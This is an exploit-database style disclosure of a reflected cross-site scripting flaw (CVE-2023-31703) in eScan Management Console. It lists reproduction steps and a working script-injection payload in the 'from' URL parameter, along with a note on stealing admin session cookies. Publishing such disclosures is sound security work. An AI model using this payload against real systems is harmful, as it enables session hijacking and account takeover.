Lucene search
Sahil Ojha1337DAY-ID-38719HistoryMay 23, 2023 - 12:00 a.m.
eScan Management Console 14.0.1400.2281 - Cross Site Scripting Vulnerability
2023-05-2300:00:00
Sahil Ojha
0day.today
105
escan management console
cross site scripting
vulnerability
sahil ojha
vendor
software
windows
cve-2023-31703
reproduction
proof of concept
payload
exploiting
# Exploit Title: eScan Management Console 14.0.1400.2281 - Cross Site Scripting
# Exploit Author: Sahil Ojha
# Vendor Homepage: https://www.escanav.com
# Software Link: https://cl.escanav.com/ewconsole.dll
# Version: 14.0.1400.2281
# Tested on: Windows
# CVE : CVE-2023-31703
*Step of Reproduction/ Proof of Concept(POC)*
1. Login into the eScan Management Console with a valid user credential.
2. Navigate to URL:
https://cl.escanav.com/ewconsole/ewconsole.dll/editUserName?usrid=4&from=banner&P=
3. Now, Inject the Cross Site Scripting Payload in "from" parameter as
shown below and a valid XSS pop up appeared.
https://cl.escanav.com/ewconsole/ewconsole.dll/editUserName?usrid=4&from="><script>alert(document.cookie)</script>banner&P=
4. By exploiting this vulnerability, any arbitrary attacker could have
stolen an admin user session cookie to perform account takeover.
Related
cvelist
cvelist
CVE-2023-31703
2023-05-17 00:00:00
packetstorm
packetstorm
eScan Management Console 14.0.1400.2281 Cross Site Scripting
2023-05-24 00:00:00
prion
prion
Cross site scripting
2023-05-17 13:15:00
cve
cve
CVE-2023-31703
2023-05-17 13:15:09
nvd
nvd
CVE-2023-31703
2023-05-17 13:15:09
exploitdb
exploitdb
eScan Management Console 14.0.1400.2281 - Cross Site Scripting
2023-05-23 00:00:00